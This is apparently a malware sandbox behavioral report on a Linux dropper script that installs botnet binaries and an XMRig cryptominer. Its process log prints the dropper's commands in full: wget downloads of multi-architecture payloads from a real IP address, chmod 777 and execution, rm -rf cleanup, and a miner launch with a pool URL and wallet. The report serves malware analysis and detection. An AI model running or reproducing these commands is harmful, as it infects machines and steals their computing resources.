N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/bots /tmp/bots N/A

Reads system routing table

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.mips N/A

Reads system network configuration

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.mips N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/tyo2831qq.mips N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tyo2831qq.x86 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.i586 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.m68k /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.mips /usr/bin/wget N/A
File opened for modification /tmp/bots /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.mpsl /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.sh4 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.arm6 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.x32 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.ppc /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.arm7 /usr/bin/wget N/A

Processes

/tmp/tyo2831qq.sh

[/tmp/tyo2831qq.sh]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mips]

/bin/chmod

[chmod 777 tyo2831qq.mips]

/tmp/tyo2831qq.mips

[./tyo2831qq.mips]

/usr/bin/wget

[wget http://31.172.80.237/bots]

/bin/chmod

[chmod 777 bots]

/tmp/bots

[./bots]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mpsl]

/bin/chmod

[chmod 777 tyo2831qq.mpsl]

/tmp/tyo2831qq.mpsl

[./tyo2831qq.mpsl]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.sh4]

/bin/chmod

[chmod 777 tyo2831qq.sh4]

/tmp/tyo2831qq.sh4

[./tyo2831qq.sh4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x86]

/bin/chmod

[chmod 777 tyo2831qq.x86]

/tmp/tyo2831qq.x86

[./tyo2831qq.x86]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm6]

/bin/chmod

[chmod 777 tyo2831qq.arm6]

/tmp/tyo2831qq.arm6

[./tyo2831qq.arm6]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x32]

/bin/chmod

[chmod 777 tyo2831qq.x32]

/tmp/tyo2831qq.x32

[./tyo2831qq.x32]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.ppc]

/bin/chmod

[chmod 777 tyo2831qq.ppc]

/tmp/tyo2831qq.ppc

[./tyo2831qq.ppc]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.i586]

/bin/chmod

[chmod 777 tyo2831qq.i586]

/tmp/tyo2831qq.i586

[./tyo2831qq.i586]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.m68k]

/bin/chmod

[chmod 777 tyo2831qq.m68k]

/tmp/tyo2831qq.m68k

[./tyo2831qq.m68k]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.spc]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm7]

/bin/chmod

[chmod 777 tyo2831qq.arm7]

/tmp/tyo2831qq.arm7

[./tyo2831qq.arm7]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm5]

/bin/rm

[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]

/usr/bin/wget

[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]

/bin/chmod

[chmod 777 xmrig]

/tmp/xmrig

[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]

Network

Country Destination Domain Proto
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:706 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
US 1.1.1.1:53 github.com udp
GB 20.26.156.215:443 github.com tcp

Files

/tmp/bots

MD5 2615e32f9e7b42b36ba1f3dd6f8f7e3c
SHA1 4286d999a1a76da1e68cb227e01de237ef5fcf68
SHA256 e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078
SHA512 b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-09 04:09

Reported

2024-11-09 04:11

Platform

debian9-mipsel-20240418-en

Max time kernel

95s

Max time network

96s

Command Line

[/tmp/tyo2831qq.sh]

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/bots /tmp/bots N/A
N/A /tmp/xmrig /tmp/xmrig N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Reads system routing table

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.mpsl N/A

Reads system network configuration

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.mpsl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/tyo2831qq.mips N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/bots /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.arm6 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.x32 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.i586 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.m68k /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.arm7 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.mips /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.mpsl /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.sh4 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.x86 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.ppc /usr/bin/wget N/A
File opened for modification /tmp/xmrig /usr/bin/wget N/A

Processes

/tmp/tyo2831qq.sh

[/tmp/tyo2831qq.sh]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mips]

/bin/chmod

[chmod 777 tyo2831qq.mips]

/tmp/tyo2831qq.mips

[./tyo2831qq.mips]

/usr/bin/wget

[wget http://31.172.80.237/bots]

/bin/chmod

[chmod 777 bots]

/tmp/bots

[./bots]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mpsl]

/bin/chmod

[chmod 777 tyo2831qq.mpsl]

/tmp/tyo2831qq.mpsl

[./tyo2831qq.mpsl]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.sh4]

/bin/chmod

[chmod 777 tyo2831qq.sh4]

/tmp/tyo2831qq.sh4

[./tyo2831qq.sh4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x86]

/bin/chmod

[chmod 777 tyo2831qq.x86]

/tmp/tyo2831qq.x86

[./tyo2831qq.x86]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm6]

/bin/chmod

[chmod 777 tyo2831qq.arm6]

/tmp/tyo2831qq.arm6

[./tyo2831qq.arm6]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x32]

/bin/chmod

[chmod 777 tyo2831qq.x32]

/tmp/tyo2831qq.x32

[./tyo2831qq.x32]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.ppc]

/bin/chmod

[chmod 777 tyo2831qq.ppc]

/tmp/tyo2831qq.ppc

[./tyo2831qq.ppc]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.i586]

/bin/chmod

[chmod 777 tyo2831qq.i586]

/tmp/tyo2831qq.i586

[./tyo2831qq.i586]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.m68k]

/bin/chmod

[chmod 777 tyo2831qq.m68k]

/tmp/tyo2831qq.m68k

[./tyo2831qq.m68k]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.spc]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm7]

/bin/chmod

[chmod 777 tyo2831qq.arm7]

/tmp/tyo2831qq.arm7

[./tyo2831qq.arm7]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm5]

/bin/rm

[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]

/usr/bin/wget

[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]

/bin/chmod

[chmod 777 xmrig]

/tmp/xmrig

[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]

Network

Country Destination Domain Proto
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:706 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
US 1.1.1.1:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 1.1.1.1:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp

Files

/tmp/bots

MD5 2615e32f9e7b42b36ba1f3dd6f8f7e3c
SHA1 4286d999a1a76da1e68cb227e01de237ef5fcf68
SHA256 e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078
SHA512 b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78

/tmp/xmrig

MD5 49fde861072798623bf35de4794f7d3d
SHA1 1c9b225d3e34db9c2a0fecb9f2c254da1371f953
SHA256 8268144d8232fc0dae86c2536eef50916e4ee9a23b15a561aa72971714359383
SHA512 14393a6a7f9103340338e74457c6f95eb7180d2a90b87e01945be621a0d0798c05fdfb08ec3dbc2ca61ee2cbb6299b48e8b27c01b00913b5e5e9ed704318ac22

/root/.wget-hsts

MD5 5e330d55bb520266447b86c2c47fdc0f
SHA1 28e862fa757fba4f7dca7fbeac6433b1bdf75ca7
SHA256 ea7045dc1e2dd6c47941880d671c5ba8536a20728965c362881e7fee0fb3d1b2
SHA512 8232b08e80b64a8fe7b46140e9ad7a170a06a66e59a6f728b9fda80531033d2ebe0fe68c0dde05a0e832d96c8817678e1ae27a8729a7e6d0c23ad06c8b9a6262